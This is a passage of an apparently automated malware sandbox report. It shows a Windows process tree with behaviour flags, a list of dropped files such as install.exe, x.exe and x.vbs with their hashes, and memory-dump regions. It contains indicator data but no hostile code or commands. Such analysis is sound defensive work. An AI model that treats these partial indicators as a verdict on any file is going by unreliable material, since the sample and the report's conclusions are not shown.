                                                                                                          1⤵
                                                                                                            PID:1008
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                              PID:4388
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:4064
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:1416
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:2904
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:3696
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4484
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2988
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                                      1⤵
                                                                                                                        PID:5048
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 5048 -s 952
                                                                                                                          2⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:5016
                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        PID:3356
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 460 -p 5048 -ip 5048
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:724
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:240
                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                        1⤵
                                                                                                                          PID:3692
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                          1⤵
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:4040
                                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                          1⤵
                                                                                                                            PID:2076
                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                            1⤵
                                                                                                                              PID:2296
                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                              1⤵
                                                                                                                                PID:4216

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.38f8e52c-81b3-4ba2-85ce-2a63e50fef04.tmp.csv
                                                                                                                                Filesize

                                                                                                                                34KB

                                                                                                                                MD5

                                                                                                                                92bcc21be9e27fb6042933e3546f28c7

                                                                                                                                SHA1

                                                                                                                                c18a029347f0ac8edaf15f29a264fa9aacee6e9b

                                                                                                                                SHA256

                                                                                                                                3edd19f851dd11ec5f90cf18aada58c894836c813aee02d106d74bbe23840b3f

                                                                                                                                SHA512

                                                                                                                                16733bc1d3cffda4bde4acbec9581b45a1757437c48a1475e46c432073b2d6c8f7c4cfac1380a46ef8aa3d8284c6af8efb75653fee54cc5d9b8d205ef087dbb4

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.81b9185b-7dad-4b94-bbb5-f86112accd9f.tmp.txt
                                                                                                                                Filesize

                                                                                                                                13KB

                                                                                                                                MD5

                                                                                                                                92326ce62cff91abc628048853e0b035

                                                                                                                                SHA1

                                                                                                                                76ebe58b4d90886a253fef815db171b09599475f

                                                                                                                                SHA256

                                                                                                                                cacb7c48b00b36eb924c705ced060c8c9f256b548ffb212984e1cdf175ed441c

                                                                                                                                SHA512

                                                                                                                                a7692494f60a5241e54e5d585069be1ed06051d84b858788f01e1a2dc3c342272add0cfc233fb59668a3281b267afd5b51797ddbc0b7202d12d0b4b7e6dc2718

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                                Filesize

                                                                                                                                404B

                                                                                                                                MD5

                                                                                                                                b670748eab7a1554f731022bf97c86ae

                                                                                                                                SHA1

                                                                                                                                0d67797d89829dcf1e6397158a6de005517a5553

                                                                                                                                SHA256

                                                                                                                                a74a2a1063414c3a336020af62c53046a917e4765d07294b97360e7a69d4f61c

                                                                                                                                SHA512

                                                                                                                                04dd43824e445c5a9f04e00a6354538b7c2aef76d4e5257b424549fbf893dbbc78af7bdbc6083937602c34dda71d58a081751acbbc88e92f12e848840f23f2a6

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                                Filesize

                                                                                                                                162KB

                                                                                                                                MD5

                                                                                                                                152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                SHA1

                                                                                                                                c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                SHA256

                                                                                                                                a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                SHA512

                                                                                                                                2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                                MD5

                                                                                                                                e4870e835feab58e50c0a2a05fdb733b

                                                                                                                                SHA1

                                                                                                                                d81f625b7dabc09e9fccd515dcd89c6c1da46ee6

                                                                                                                                SHA256

                                                                                                                                0ca17ef0a09d95e6751b571a80cc965de79bda8e94c35bdee537c897951125b1

                                                                                                                                SHA512

                                                                                                                                488234c5c66c3c18376ceff9493c2f12302dafce8b02cd7124bce7682031dad95712a8e652efe75629c101e3efa7347245892a8e89c735816c637ff7ecfb4cd5

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x
                                                                                                                                Filesize

                                                                                                                                560KB

                                                                                                                                MD5

                                                                                                                                7a0b5e602d8f8674134628255c8955b3

                                                                                                                                SHA1

                                                                                                                                eb1171c299ac9dd2199d12d7084a9a68a8ab33ad

                                                                                                                                SHA256

                                                                                                                                2629b725c93d70dde683bd0bf89e749d4e7c469096a3f0d89fcf09ea871c0021

                                                                                                                                SHA512

                                                                                                                                b059685576ed14753eee0264a56f8d852036db659ec0aeb91527331ef967f349a8cd57c6f16302acdf6a900718e2588651aed051ed67e4a4f73bf4c0b00f4f41

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x.exe
                                                                                                                                Filesize

                                                                                                                                409KB

                                                                                                                                MD5

                                                                                                                                7417c8c73e614f293152575f46134216

                                                                                                                                SHA1

                                                                                                                                cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                                                SHA256

                                                                                                                                00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                                                SHA512

                                                                                                                                897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x.vbs
                                                                                                                                Filesize

                                                                                                                                380B

                                                                                                                                MD5

                                                                                                                                ec9a2fb69a379d913a4e0a953cd3b97c

                                                                                                                                SHA1

                                                                                                                                a0303ed9f787c042071a1286bba43a5bbdd0679e

                                                                                                                                SHA256

                                                                                                                                cf8268d158bb819ef158ff6ccbed64d5e379148a0adb1f73a082a01d56d0286b

                                                                                                                                SHA512

                                                                                                                                fef8e24a680991046bd7dacd6079c7e48c3031fe46caae722ea93797ee16c052073ba97959e992ea71ac7ab72fbcedaa5cf4a410657aac4c10ad24de6935e9d6

                                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_fwbmohj4.nrb.ps1
                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                Filesize

                                                                                                                                338B

                                                                                                                                MD5

                                                                                                                                92b26de35f6382ca8a64a21d4ad4a110

                                                                                                                                SHA1

                                                                                                                                875944723bf1967f073e240e2e4b1223063dc119

                                                                                                                                SHA256

                                                                                                                                a48f13cd4585d7b4cc5c502364fa20532f3540d2a92b2330bdfabee5d00debcf

                                                                                                                                SHA512

                                                                                                                                a7a57debc4b773213326a23be7c2719088951947c1842221a62eff2dd039119bf26f1297fa17b360f224e988b5168964d4083795385b3097a6dcb2ccc71cb7f9

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
                                                                                                                                Filesize

                                                                                                                                412B

                                                                                                                                MD5

                                                                                                                                9b4e430bfdbe43c314b10a66fd818b96

                                                                                                                                SHA1

                                                                                                                                9094f1e3f4705571c4f46d23bbb5488b22bbe3dc

                                                                                                                                SHA256

                                                                                                                                d8fd90517fcc9e2429a582f184d87c42f64ecd3c10520649a371db951b6396bf

                                                                                                                                SHA512

                                                                                                                                607385cc131905a81544e3d74603ceeef58d28a7cb797780d82e8ef081f8f3422e30d3d46259949b8e0f8fe7ba216988dddadff6bb8685cf6558654c00197502

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                5f4c933102a824f41e258078e34165a7

                                                                                                                                SHA1

                                                                                                                                d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

                                                                                                                                SHA256

                                                                                                                                d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

                                                                                                                                SHA512

                                                                                                                                a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                Filesize

                                                                                                                                560B

                                                                                                                                MD5

                                                                                                                                f92307e610a2674854ded4e760aae7be

                                                                                                                                SHA1

                                                                                                                                3dfaeff1137b086a2f183c78a7fca9af005477b4

                                                                                                                                SHA256

                                                                                                                                3d5ae7e8e67ac8adc10d8e08a39d5f689de3816243f0ce6d6559b8500384c914

                                                                                                                                SHA512

                                                                                                                                7007572a57dc40603c03dcafcce19bd213f0b3c2a42ccc7e6068963afe4b1c9bef038ce1fb36233b6c265a5cdaa8da5c4f1c2f5f9a2eaafeab964ba54968996e

                                                                                                                              • memory/424-8087-0x000002165AE60000-0x000002165AE8B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/560-8082-0x0000018645550000-0x000001864557B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/560-8076-0x0000018645550000-0x000001864557B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/560-8083-0x00007FFE381D0000-0x00007FFE381E0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/640-8041-0x000001AE92600000-0x000001AE92625000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                148KB

                                                                                                                              • memory/640-8049-0x000001AE92630000-0x000001AE9265B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/640-8042-0x000001AE92630000-0x000001AE9265B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/640-8050-0x00007FFE381D0000-0x00007FFE381E0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/640-8043-0x000001AE92630000-0x000001AE9265B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-8060-0x000001AAC47D0000-0x000001AAC47FB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-8054-0x000001AAC47D0000-0x000001AAC47FB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-8061-0x00007FFE381D0000-0x00007FFE381E0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/996-8065-0x000002511E7A0000-0x000002511E7CB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/996-8072-0x00007FFE381D0000-0x00007FFE381E0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/996-8071-0x000002511E7A0000-0x000002511E7CB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/1544-8032-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8038-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8031-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8035-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8036-0x00007FFE78140000-0x00007FFE78349000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/1544-8033-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8030-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1544-8037-0x00007FFE77C60000-0x00007FFE77D1D000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                756KB

                                                                                                                              • memory/2380-7991-0x0000000006030000-0x0000000006042000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/2380-7990-0x0000000005AE0000-0x0000000005B46000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                408KB

                                                                                                                              • memory/2380-7985-0x000000007496E000-0x000000007496F000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/2380-7986-0x0000000000E90000-0x0000000000EFC000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                432KB

                                                                                                                              • memory/2380-8004-0x0000000074960000-0x0000000075111000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                7.7MB

                                                                                                                              • memory/2380-7987-0x0000000006090000-0x0000000006636000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                5.6MB

                                                                                                                              • memory/2380-7992-0x0000000006C10000-0x0000000006C4C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                240KB

                                                                                                                              • memory/2380-7988-0x0000000005A10000-0x0000000005AA2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                584KB

                                                                                                                              • memory/2380-7989-0x0000000074960000-0x0000000075111000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                7.7MB

                                                                                                                              • memory/3856-9291-0x0000000074960000-0x0000000075111000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                7.7MB

                                                                                                                              • memory/3856-7998-0x0000000074960000-0x0000000075111000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                7.7MB

                                                                                                                              • memory/3856-8018-0x00000000068C0000-0x00000000068CA000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                40KB

                                                                                                                              • memory/4604-8027-0x000001F0FD770000-0x000001F0FD79A000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/4604-8029-0x00007FFE77C60000-0x00007FFE77D1D000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                756KB

                                                                                                                              • memory/4604-8028-0x00007FFE78140000-0x00007FFE78349000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/4604-8005-0x000001F0FD3C0000-0x000001F0FD3E2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                136KB